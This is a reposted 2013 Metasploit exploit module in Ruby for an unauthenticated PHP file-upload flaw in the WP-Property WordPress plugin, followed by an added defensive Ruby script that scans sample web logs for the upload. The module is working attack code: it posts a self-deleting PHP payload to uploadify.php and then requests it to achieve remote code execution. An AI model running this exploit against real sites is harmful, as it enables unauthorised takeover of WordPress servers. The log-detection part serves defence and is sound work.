
WordPress WP-Property PHP File Upload Vulnerability

Posted on 2013-1-4 19:51:30
WordPress WP-Property PHP File Upload Vulnerability

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def check
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end

Don't ask me what this is or how to use it. I mean, it's msf.
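
For defenders, an added example that is not part of the original post or of the Metasploit module: the module builds its payload with `:unlink_self=>true`, so the uploaded file may no longer be on disk and the web access log is the place to look. The Ruby code below scans Apache combined-format log lines for a successful POST to uploadify.php and for 200 responses to other .php files under the uploadify directory; the log lines, the `KNOWN_SCRIPTS` allowlist and the function names are assumptions made for this example.

```ruby
# Added example, not from the original post. Log lines are constructed sample data.
UPLOADIFY_DIR = 'wp-content/plugins/wp-property/third-party/uploadify/'
# Assumption: scripts a clean plugin copy ships in that directory; adjust to your install.
KNOWN_SCRIPTS = %w[uploadify.php check.php].freeze
LOG_RE = /\A(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) /

SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [04/Jan/2013:19:40:01 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 0 "-" "-"
  203.0.113.7 - - [04/Jan/2013:19:40:02 +0800] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 71 "-" "-"
  203.0.113.7 - - [04/Jan/2013:19:40:03 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/AbCdE.php HTTP/1.1" 200 0 "-" "-"
  198.51.100.20 - - [04/Jan/2013:19:41:10 +0800] "GET /wordpress/index.php HTTP/1.1" 200 5120 "-" "-"
  198.51.100.20 - - [04/Jan/2013:19:41:12 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/old.php HTTP/1.1" 404 210 "-" "-"
  192.0.2.9 - - [04/Jan/2013:19:45:00 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/s.PHP?x=1 HTTP/1.1" 200 33 "-" "-"
LOG

# Parse one combined-format line into a hash, or nil if it does not match.
def parse_line(line)
  m = LOG_RE.match(line) or return nil
  { ip: m[1], time: m[2], verb: m[3], path: m[4].split('?').first.to_s, status: m[5].to_i }
end

# Return findings for successful requests that touch the uploadify directory:
#   :upload            POST to uploadify.php answered with 200
#   :php_after_upload  unknown .php served to a client that uploaded earlier
#   :unexpected_php    unknown .php served with no upload seen from that client
def uploadify_findings(log)
  uploaders = {}
  findings = []
  log.each_line do |line|
    e = parse_line(line.chomp) or next
    idx = e[:path].index(UPLOADIFY_DIR) or next
    file = e[:path][(idx + UPLOADIFY_DIR.length)..-1].downcase
    next unless e[:status] == 200
    if file == 'uploadify.php' && e[:verb] == 'POST'
      uploaders[e[:ip]] = true
      findings << e.merge(type: :upload)
    elsif file.end_with?('.php') && !KNOWN_SCRIPTS.include?(file)
      type = uploaders[e[:ip]] ? :php_after_upload : :unexpected_php
      findings << e.merge(type: type)
    end
  end
  findings
end

uploadify_findings(SAMPLE_LOG).each do |f|
  puts format('%-16s %-15s %s %s', f[:type], f[:ip], f[:time], f[:path])
end
```

Any `:upload` finding on a site running WP-Property <= 1.35.0 deserves follow-up even without a matching `:php_after_upload`, since the two requests can arrive from different addresses.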
